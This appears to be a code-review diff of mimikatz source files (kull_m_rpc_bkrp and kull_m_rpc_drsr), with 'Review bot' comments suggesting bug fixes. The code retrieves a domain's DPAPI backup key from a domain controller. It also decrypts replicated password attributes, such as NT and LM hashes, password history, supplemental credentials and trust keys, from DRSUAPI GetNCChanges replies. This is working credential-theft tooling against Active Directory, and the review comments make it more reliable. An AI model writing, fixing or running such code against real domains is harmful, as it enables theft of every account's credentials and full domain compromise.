status = kull_m_rpc_createBinding(L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
if(szTmpDc)
LocalFree(szTmpDc);
return status;
}
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
BOOL status = FALSE;
RPC_BINDING_HANDLE hBinding;
NET_API_STATUS netStatus;
PBYTE out = NULL;
*pDataOut = NULL;
*pdwDataOut = 0;
if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
{
RpcTryExcept
{
netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
if(status = (netStatus == 0))
{
if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut))
RtlCopyMemory(*pDataOut, out, *pdwDataOut);
MIDL_user_free(out);
}
else PRINT_ERROR(L"BackuprKey 0x%08x (%u)\n", netStatus, netStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kull_m_rpc_deleteBinding(&hBinding);
}
return status;
}
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
{
BYTE dataIn = 'k';
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut);
}
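Review bot: In `kull_m_rpc_bkrp_generic`, when `LocalAlloc` fails after a successful `BackuprKey`, `status` stays TRUE while `*pDataOut` is NULL and `*pdwDataOut` still carries the server's length, so a caller trusting the return value dereferences NULL. Change the copy to `if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut)) RtlCopyMemory(*pDataOut, out, *pdwDataOut); else { status = FALSE; *pdwDataOut = 0; }`. `hBinding` is also declared uninitialized and only assigned on the success path of `kull_m_rpc_bkrp_createBinding`; it is not read otherwise, but `RPC_BINDING_HANDLE hBinding = NULL;` costs nothing and mirrors `kull_m_rpc_createBinding`'s own `*hBinding = NULL`.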


@ -0,0 +1,17 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "kull_m_rpc_ms-bkrp.h"
#include "../kull_m_net.h"
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding);
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut);
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut);
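Review bot: The ownership contract of the output parameters is not documented on these declarations. From the implementation, `*pDataOut` is returned as a `LocalAlloc(LPTR)` block that the caller must release with `LocalFree` (both outputs are reset to NULL/0 on entry), and `NetworkAddr` may be NULL, in which case a writable DC is located with `kull_m_net_getDC`; a two-line comment above `kull_m_rpc_bkrp_generic` stating both would save readers a trip into the .c file.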


@ -0,0 +1,415 @@
/* Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com / http://blog.gentilkiwi.com )
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_drsr.h"
SecPkgContext_SessionKey kull_m_rpc_drsr_g_sKey = {0, NULL};
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context)
{
RPC_STATUS rpcStatus;
SECURITY_STATUS secStatus;
PCtxtHandle data = NULL;
rpcStatus = I_RpcBindingInqSecurityContext(Context, (LPVOID *) &data);
if(rpcStatus == RPC_S_OK)
{
if(kull_m_rpc_drsr_g_sKey.SessionKey)
{
FreeContextBuffer(kull_m_rpc_drsr_g_sKey.SessionKey);
kull_m_rpc_drsr_g_sKey.SessionKeyLength = 0;
kull_m_rpc_drsr_g_sKey.SessionKey = NULL;
}
secStatus = QueryContextAttributes(data, SECPKG_ATTR_SESSION_KEY, (LPVOID) &kull_m_rpc_drsr_g_sKey);
if(secStatus != SEC_E_OK)
PRINT_ERROR(L"QueryContextAttributes %08x\n", secStatus);
}
else PRINT_ERROR(L"I_RpcBindingInqSecurityContext %08x\n", rpcStatus);
}
GUID DRSUAPI_DS_BIND_GUID_Standard = {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
BOOL DomainGUIDfound = FALSE, ObjectGUIDfound = FALSE;
DWORD i;
ULONG drsStatus;
DRS_HANDLE hDrs = NULL;
DRS_MSG_DCINFOREQ dcInfoReq = {0};
DWORD dcOutVersion = 0;
DRS_MSG_DCINFOREPLY dcInfoRep = {0};
LPWSTR sGuid;
UNICODE_STRING uGuid;
RtlZeroMemory(pDrsExtensionsInt, sizeof(DRS_EXTENSIONS_INT));
pDrsExtensionsInt->cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
pDrsExtensionsInt->dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION;
if(kull_m_rpc_drsr_getDCBind(hBinding, &DRSUAPI_DS_BIND_GUID_Standard, &hDrs, pDrsExtensionsInt))
{
RpcTryExcept
{
dcInfoReq.V1.InfoLevel = 2;
dcInfoReq.V1.Domain = (LPWSTR) Domain;
drsStatus = IDL_DRSDomainControllerInfo(hDrs, 1, &dcInfoReq, &dcOutVersion, &dcInfoRep);
if(drsStatus == 0)
{
if(dcOutVersion == 2)
{
for(i = 0; i < dcInfoRep.V2.cItems; i++)
{
if(!DomainGUIDfound && ((_wcsicmp(ServerName, dcInfoRep.V2.rItems[i].DnsHostName) == 0) || (_wcsicmp(ServerName, dcInfoRep.V2.rItems[i].NetbiosName) == 0)))
{
DomainGUIDfound = TRUE;
*DomainGUID = dcInfoRep.V2.rItems[i].NtdsDsaObjectGuid;
}
}
if(!DomainGUIDfound)
PRINT_ERROR(L"DomainControllerInfo: DC \'%s\' not found\n", ServerName);
}
else PRINT_ERROR(L"DomainControllerInfo: bad version (%u)\n", dcOutVersion);
kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(dcOutVersion, &dcInfoRep);
}
else PRINT_ERROR(L"DomainControllerInfo: 0x%08x (%u)\n", drsStatus, drsStatus);
if(Guid)
{
RtlInitUnicodeString(&uGuid, Guid);
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
}
else if(User)
{
if(kull_m_rpc_drsr_CrackName(hDrs, wcschr(User, L'\\') ? DS_NT4_ACCOUNT_NAME : wcschr(User, L'=') ? DS_FQDN_1779_NAME : wcschr(User, L'@') ? DS_USER_PRINCIPAL_NAME : DS_NT4_ACCOUNT_NAME_SANS_DOMAIN, User, DS_UNIQUE_ID_NAME, &sGuid, NULL))
{
RtlInitUnicodeString(&uGuid, sGuid);
ObjectGUIDfound = NT_SUCCESS(RtlGUIDFromString(&uGuid, UserGuid));
}
}
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
}
return (DomainGUIDfound && (ObjectGUIDfound || !(Guid || User)));
}
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
BOOL status = FALSE;
ULONG drsStatus;
DRS_EXTENSIONS_INT *pDrsExtensionsOutput = NULL;
RpcTryExcept
{
drsStatus = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) pDrsExtensionsInt, (DRS_EXTENSIONS **) &pDrsExtensionsOutput, hDrs); // to free ?
if(drsStatus == 0)
{
if(pDrsExtensionsOutput)
{
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, SiteObjGuid) - sizeof(DWORD))
{
if(pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
status = TRUE;
else PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", pDrsExtensionsOutput->dwFlags);
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, Pid) - sizeof(DWORD))
{
pDrsExtensionsInt->SiteObjGuid = pDrsExtensionsOutput->SiteObjGuid;
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwFlagsExt) - sizeof(DWORD))
{
pDrsExtensionsInt->dwReplEpoch = pDrsExtensionsOutput->dwReplEpoch;
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, ConfigObjGUID) - sizeof(DWORD))
{
pDrsExtensionsInt->dwExtCaps = MAXDWORD32;
//pDrsExtensionsInt->dwFlagsExt = pDrsExtensionsOutput->dwFlagsExt & (DRS_EXT_RECYCLE_BIN | DRS_EXT_PAM);
if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
pDrsExtensionsInt->ConfigObjGUID = pDrsExtensionsOutput->ConfigObjGUID;
}
}
}
}
else PRINT_ERROR(L"Incorrect DRS Extensions Output Size (%u)\n", pDrsExtensionsOutput->cb);
MIDL_user_free(pDrsExtensionsOutput);
}
else PRINT_ERROR(L"No DRS Extensions Output\n");
if(!status)
IDL_DRSUnbind(hDrs);
}
else PRINT_ERROR(L"IDL_DRSBind: %u\n", drsStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
const wchar_t * KULL_M_RPC_DRSR_CrackNames_Error[] = {L"NO_ERROR", L"ERROR_RESOLVING", L"ERROR_NOT_FOUND", L"ERROR_NOT_UNIQUE", L"ERROR_NO_MAPPING", L"ERROR_DOMAIN_ONLY", L"ERROR_NO_SYNTACTICAL_MAPPING", L"ERROR_TRUST_REFERRAL"};
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain)
{
BOOL status = FALSE;
DRS_MSG_CRACKREQ nameCrackReq = {0};
DWORD nameCrackOutVersion = 0, drsStatus;
DRS_MSG_CRACKREPLY nameCrackRep = {0};
nameCrackReq.V1.formatOffered = NameFormat;
nameCrackReq.V1.formatDesired = FormatWanted;
nameCrackReq.V1.cNames = 1;
nameCrackReq.V1.rpNames = (LPWSTR *) &Name;
RpcTryExcept
{
drsStatus = IDL_DRSCrackNames(hDrs, 1, &nameCrackReq, &nameCrackOutVersion, &nameCrackRep);
if(drsStatus == 0)
{
if(nameCrackOutVersion == 1)
{
if(nameCrackRep.V1.pResult->cItems == 1)
{
drsStatus = nameCrackRep.V1.pResult->rItems[0].status;
if(status = (drsStatus == DS_NAME_NO_ERROR))
{
kull_m_string_copy(CrackedName, nameCrackRep.V1.pResult->rItems[0].pName);
kull_m_string_copy(CrackedDomain, nameCrackRep.V1.pResult->rItems[0].pDomain);
}
else PRINT_ERROR(L"CrackNames (name status): 0x%08x (%u) - %s\n", drsStatus, drsStatus, (drsStatus < ARRAYSIZE(KULL_M_RPC_DRSR_CrackNames_Error)) ? KULL_M_RPC_DRSR_CrackNames_Error[drsStatus] : L"?");
}
else PRINT_ERROR(L"CrackNames: no item!\n");
}
else PRINT_ERROR(L"CrackNames: bad version (%u)\n", nameCrackOutVersion);
kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(nameCrackOutVersion, &nameCrackRep);
}
else PRINT_ERROR(L"CrackNames: 0x%08x (%u)\n", drsStatus, drsStatus);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
return status;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very partial, ofc
{
REPLENTINFLIST * pReplentinflist, *pNextReplentinflist = objects;
DWORD i, j;
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
if(pReplentinflist->Entinf.AttrBlock.pAttr)
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
switch(pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
{
case ATT_CURRENT_VALUE:
case ATT_UNICODE_PWD:
case ATT_NT_PWD_HISTORY:
case ATT_DBCS_PWD:
case ATT_LM_PWD_HISTORY:
case ATT_SUPPLEMENTAL_CREDENTIALS:
case ATT_TRUST_AUTH_INCOMING:
case ATT_TRUST_AUTH_OUTGOING:
// case another :
// case another :
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j]))
return FALSE;
break;
default:
break;
}
}
}
}
return TRUE;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val)
{
BOOL status = FALSE;
PENCRYPTED_PAYLOAD encrypted;
MD5_CTX md5ctx;
CRYPTO_BUFFER cryptoKey = {MD5_DIGEST_LENGTH, MD5_DIGEST_LENGTH, NULL}, cryptoData;
DWORD realLen, calcChecksum;
PVOID toFree;
if(kull_m_rpc_drsr_g_sKey.SessionKey && kull_m_rpc_drsr_g_sKey.SessionKeyLength)
{
if((val->valLen >= (ULONG) FIELD_OFFSET(ENCRYPTED_PAYLOAD, EncryptedData)) && val->pVal)
{
encrypted = (PENCRYPTED_PAYLOAD) val->pVal;
MD5Init(&md5ctx);
MD5Update(&md5ctx, kull_m_rpc_drsr_g_sKey.SessionKey, kull_m_rpc_drsr_g_sKey.SessionKeyLength);
MD5Update(&md5ctx, encrypted->Salt, sizeof(encrypted->Salt));
MD5Final(&md5ctx);
cryptoKey.Buffer = md5ctx.digest;
cryptoData.Length = cryptoData.MaximumLength = val->valLen - FIELD_OFFSET(ENCRYPTED_PAYLOAD, CheckSum);
cryptoData.Buffer = (PBYTE) &encrypted->CheckSum;
if(NT_SUCCESS(RtlEncryptDecryptRC4(&cryptoData, &cryptoKey)))
{
realLen = val->valLen - FIELD_OFFSET(ENCRYPTED_PAYLOAD, EncryptedData);
if(kull_m_crypto_hash(CALG_CRC32, encrypted->EncryptedData, realLen, &calcChecksum, sizeof(calcChecksum)))
{
if(calcChecksum == encrypted->CheckSum)
{
toFree = val->pVal;
if(val->pVal = (UCHAR *) MIDL_user_allocate(realLen))
{
RtlCopyMemory(val->pVal, encrypted->EncryptedData, realLen);
val->valLen = realLen;
status = TRUE;
MIDL_user_free(toFree);
}
}
else PRINT_ERROR(L"Checksums don\'t match (C:0x%08x - R:0x%08x)\n", calcChecksum, encrypted->CheckSum);
}
else PRINT_ERROR(L"Unable to calculate CRC32\n");
}
else PRINT_ERROR(L"RtlEncryptDecryptRC4\n");
}
else PRINT_ERROR(L"No valid data\n");
}
else PRINT_ERROR(L"No Session Key\n");
return status;
}
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply)
{
DWORD i;
if(reply)
{
switch (nameCrackOutVersion)
{
case 1:
if(reply->V1.pResult)
{
for(i = 0; i < reply->V1.pResult->cItems; i++)
{
if(reply->V1.pResult->rItems[i].pDomain)
MIDL_user_free(reply->V1.pResult->rItems[i].pDomain);
if(reply->V1.pResult->rItems[i].pName)
MIDL_user_free(reply->V1.pResult->rItems[i].pName);
}
if(reply->V1.pResult->rItems)
MIDL_user_free(reply->V1.pResult->rItems);
MIDL_user_free(reply->V1.pResult);
}
break;
default:
PRINT_ERROR(L"nameCrackOutVersion not valid (0x%08x - %u)\n", nameCrackOutVersion, nameCrackOutVersion);
break;
}
}
}
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply)
{
DWORD i;
if(reply)
{
switch (dcOutVersion)
{
case 2:
for(i = 0; i < reply->V2.cItems; i++)
{
if(reply->V2.rItems[i].NetbiosName)
MIDL_user_free(reply->V2.rItems[i].NetbiosName);
if(reply->V2.rItems[i].DnsHostName)
MIDL_user_free(reply->V2.rItems[i].DnsHostName);
if(reply->V2.rItems[i].SiteName)
MIDL_user_free(reply->V2.rItems[i].SiteName);
if(reply->V2.rItems[i].SiteObjectName)
MIDL_user_free(reply->V2.rItems[i].SiteObjectName);
if(reply->V2.rItems[i].ComputerObjectName)
MIDL_user_free(reply->V2.rItems[i].ComputerObjectName);
if(reply->V2.rItems[i].ServerObjectName)
MIDL_user_free(reply->V2.rItems[i].ServerObjectName);
if(reply->V2.rItems[i].NtdsDsaObjectName)
MIDL_user_free(reply->V2.rItems[i].NtdsDsaObjectName);
}
if(reply->V2.rItems)
MIDL_user_free(reply->V2.rItems);
break;
case 1:
case 3:
case 0xffffffff:
PRINT_ERROR(L"TODO (maybe?)\n");
break;
default:
PRINT_ERROR(L"dcOutVersion not valid (0x%08x - %u)\n", dcOutVersion, dcOutVersion);
break;
}
}
}
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply)
{
DWORD i, j;
REPLENTINFLIST *pReplentinflist, *pNextReplentinflist;
if(reply)
{
switch(dwOutVersion)
{
case 6:
if(reply->V6.pNC)
MIDL_user_free(reply->V6.pNC);
if(reply->V6.pUpToDateVecSrc)
MIDL_user_free(reply->V6.pUpToDateVecSrc);
if(reply->V6.PrefixTableSrc.pPrefixEntry)
{
for(i = 0; i < reply->V6.PrefixTableSrc.PrefixCount; i++)
if(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements)
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements);
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry);
}
pNextReplentinflist = reply->V6.pObjects;
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
if(pReplentinflist->Entinf.pName)
MIDL_user_free(pReplentinflist->Entinf.pName);
if(pReplentinflist->Entinf.AttrBlock.pAttr)
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
{
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal);
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal);
}
}
MIDL_user_free(pReplentinflist->Entinf.AttrBlock.pAttr);
}
if(pReplentinflist->pParentGuid)
MIDL_user_free(pReplentinflist->pParentGuid);
if(pReplentinflist->pMetaDataExt)
MIDL_user_free(pReplentinflist->pMetaDataExt);
MIDL_user_free(pReplentinflist);
}
if(reply->V6.rgValues)
{
for(i = 0; i < reply->V6.cNumValues; i++)
{
if(reply->V6.rgValues[i].pObject)
MIDL_user_free(reply->V6.rgValues[i].pObject);
if(reply->V6.rgValues[i].Aval.pVal)
MIDL_user_free(reply->V6.rgValues[i].Aval.pVal);
}
MIDL_user_free(reply->V6.rgValues);
}
break;
case 1:
case 2:
case 7:
case 9:
PRINT_ERROR(L"TODO (maybe?)\n");
break;
default:
PRINT_ERROR(L"dwOutVersion not valid (0x%08x - %u)\n", dwOutVersion, dwOutVersion);
break;
}
}
}
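Review bot: `kull_m_rpc_drsr_getDomainAndUserInfos` binds a DRS context handle (`hDrs`, via `kull_m_rpc_drsr_getDCBind`) and returns without ever calling `IDL_DRSUnbind(&hDrs);`, so every call leaves a bound context on the DC; `kull_m_rpc_drsr_getDCBind` itself unbinds on its failure path, and the caller should do the same once the DomainControllerInfo/CrackNames work is done, inside its `RpcTryExcept`. `sGuid` filled by `kull_m_rpc_drsr_CrackName` (through `kull_m_string_copy`, which presumably allocates) is likewise never released. In `kull_m_rpc_drsr_getDCBind`, `pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION)` is satisfied by a peer advertising either flag alone; if both are required — the decrypt path relies on the session-key-based encryption — the test should be `(pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION)) == (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION)`. `kull_m_rpc_drsr_CrackName` also dereferences `nameCrackRep.V1.pResult` for `->cItems` without a NULL check, although the free routine below does check it.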


@ -0,0 +1,205 @@
/* Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com / http://blog.gentilkiwi.com )
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "../kull_m_crypto_system.h"
#include "../kull_m_crypto.h"
#include "../kull_m_string.h"
#include "kull_m_rpc_ms-drsr.h"
typedef struct _DRS_EXTENSIONS_INT {
DWORD cb;
DWORD dwFlags;
GUID SiteObjGuid;
DWORD Pid;
DWORD dwReplEpoch;
DWORD dwFlagsExt;
GUID ConfigObjGUID;
DWORD dwExtCaps;
} DRS_EXTENSIONS_INT, *PDRS_EXTENSIONS_INT;
typedef struct _ENCRYPTED_PAYLOAD {
UCHAR Salt[16];
ULONG CheckSum;
UCHAR EncryptedData[ANYSIZE_ARRAY];
} ENCRYPTED_PAYLOAD, *PENCRYPTED_PAYLOAD;
#define DRS_EXT_BASE 0x00000001
#define DRS_EXT_ASYNCREPL 0x00000002
#define DRS_EXT_REMOVEAPI 0x00000004
#define DRS_EXT_MOVEREQ_V2 0x00000008
#define DRS_EXT_GETCHG_DEFLATE 0x00000010
#define DRS_EXT_DCINFO_V1 0x00000020
#define DRS_EXT_RESTORE_USN_OPTIMIZATION 0x00000040
#define DRS_EXT_ADDENTRY 0x00000080
#define DRS_EXT_KCC_EXECUTE 0x00000100
#define DRS_EXT_ADDENTRY_V2 0x00000200
#define DRS_EXT_LINKED_VALUE_REPLICATION 0x00000400
#define DRS_EXT_DCINFO_V2 0x00000800
#define DRS_EXT_INSTANCE_TYPE_NOT_REQ_ON_MOD 0x00001000
#define DRS_EXT_CRYPTO_BIND 0x00002000
#define DRS_EXT_GET_REPL_INFO 0x00004000
#define DRS_EXT_STRONG_ENCRYPTION 0x00008000
#define DRS_EXT_DCINFO_VFFFFFFFF 0x00010000
#define DRS_EXT_TRANSITIVE_MEMBERSHIP 0x00020000
#define DRS_EXT_ADD_SID_HISTORY 0x00040000
#define DRS_EXT_POST_BETA3 0x00080000
#define DRS_EXT_GETCHGREQ_V5 0x00100000
#define DRS_EXT_GETMEMBERSHIPS2 0x00200000
#define DRS_EXT_GETCHGREQ_V6 0x00400000
#define DRS_EXT_NONDOMAIN_NCS 0x00800000
#define DRS_EXT_GETCHGREQ_V8 0x01000000
#define DRS_EXT_GETCHGREPLY_V5 0x02000000
#define DRS_EXT_GETCHGREPLY_V6 0x04000000
#define DRS_EXT_WHISTLER_BETA3 0x08000000
#define DRS_EXT_W2K3_DEFLATE 0x10000000
#define DRS_EXT_GETCHGREQ_V10 0x20000000
#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART2 0x40000000
#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART3 0x80000000
#define DRS_EXT_ADAM 0x00000001
#define DRS_EXT_LH_BETA2 0x00000002
#define DRS_EXT_RECYCLE_BIN 0x00000004
#define DRS_EXT_GETCHGREPLY_V9 0x00000100
#define DRS_EXT_PAM 0x00000200
#define DRS_ASYNC_OP 0x00000001
#define DRS_GETCHG_CHECK 0x00000002
#define DRS_UPDATE_NOTIFICATION 0x00000002
#define DRS_ADD_REF 0x00000004
#define DRS_SYNC_ALL 0x00000008
#define DRS_DEL_REF 0x00000008
#define DRS_WRIT_REP 0x00000010
#define DRS_INIT_SYNC 0x00000020
#define DRS_PER_SYNC 0x00000040
#define DRS_MAIL_REP 0x00000080
#define DRS_ASYNC_REP 0x00000100
#define DRS_IGNORE_ERROR 0x00000100
#define DRS_TWOWAY_SYNC 0x00000200
#define DRS_CRITICAL_ONLY 0x00000400
#define DRS_GET_ANC 0x00000800
#define DRS_GET_NC_SIZE 0x00001000
#define DRS_LOCAL_ONLY 0x00001000
#define DRS_NONGC_RO_REP 0x00002000
#define DRS_SYNC_BYNAME 0x00004000
#define DRS_REF_OK 0x00004000
#define DRS_FULL_SYNC_NOW 0x00008000
#define DRS_NO_SOURCE 0x00008000
#define DRS_FULL_SYNC_IN_PROGRESS 0x00010000
#define DRS_FULL_SYNC_PACKET 0x00020000
#define DRS_SYNC_REQUEUE 0x00040000
#define DRS_SYNC_URGENT 0x00080000
#define DRS_REF_GCSPN 0x00100000
#define DRS_NO_DISCARD 0x00100000
#define DRS_NEVER_SYNCED 0x00200000
#define DRS_SPECIAL_SECRET_PROCESSING 0x00400000
#define DRS_INIT_SYNC_NOW 0x00800000
#define DRS_PREEMPTED 0x01000000
#define DRS_SYNC_FORCED 0x02000000
#define DRS_DISABLE_AUTO_SYNC 0x04000000
#define DRS_DISABLE_PERIODIC_SYNC 0x08000000
#define DRS_USE_COMPRESSION 0x10000000
#define DRS_NEVER_NOTIFY 0x20000000
#define DRS_SYNC_PAS 0x40000000
#define DRS_GET_ALL_GROUP_MEMBERSHIP 0x80000000
typedef enum {
DS_UNKNOWN_NAME = 0,
DS_FQDN_1779_NAME = 1,
DS_NT4_ACCOUNT_NAME = 2,
DS_DISPLAY_NAME = 3,
DS_UNIQUE_ID_NAME = 6,
DS_CANONICAL_NAME = 7,
DS_USER_PRINCIPAL_NAME = 8,
DS_CANONICAL_NAME_EX = 9,
DS_SERVICE_PRINCIPAL_NAME = 10,
DS_SID_OR_SID_HISTORY_NAME = 11,
DS_DNS_DOMAIN_NAME = 12,
DS_LIST_SITES = -1,
DS_LIST_SERVERS_IN_SITE = -2,
DS_LIST_DOMAINS_IN_SITE = -3,
DS_LIST_SERVERS_FOR_DOMAIN_IN_SITE = -4,
DS_LIST_INFO_FOR_SERVER = -5,
DS_LIST_ROLES = -6,
DS_NT4_ACCOUNT_NAME_SANS_DOMAIN = -7,
DS_MAP_SCHEMA_GUID = -8,
DS_LIST_DOMAINS = -9,
DS_LIST_NCS = -10,
DS_ALT_SECURITY_IDENTITIES_NAME = -11,
DS_STRING_SID_NAME = -12,
DS_LIST_SERVERS_WITH_DCS_IN_SITE = -13,
DS_USER_PRINCIPAL_NAME_FOR_LOGON = -14,
DS_LIST_GLOBAL_CATALOG_SERVERS = -15,
DS_NT4_ACCOUNT_NAME_SANS_DOMAIN_EX = -16,
DS_USER_PRINCIPAL_NAME_AND_ALTSECID = -17,
} DS_NAME_FORMAT;
typedef enum {
DS_NAME_NO_ERROR = 0,
DS_NAME_ERROR_RESOLVING = 1,
DS_NAME_ERROR_NOT_FOUND = 2,
DS_NAME_ERROR_NOT_UNIQUE = 3,
DS_NAME_ERROR_NO_MAPPING = 4,
DS_NAME_ERROR_DOMAIN_ONLY = 5,
DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 6,
DS_NAME_ERROR_TRUST_REFERRAL = 7
} DS_NAME_ERROR;
typedef enum {
EXOP_FSMO_REQ_ROLE = 1,
EXOP_FSMO_REQ_RID_ALLOC = 2,
EXOP_FSMO_RID_REQ_ROLE = 3,
EXOP_FSMO_REQ_PDC = 4,
EXOP_FSMO_ABANDON_ROLE = 5,
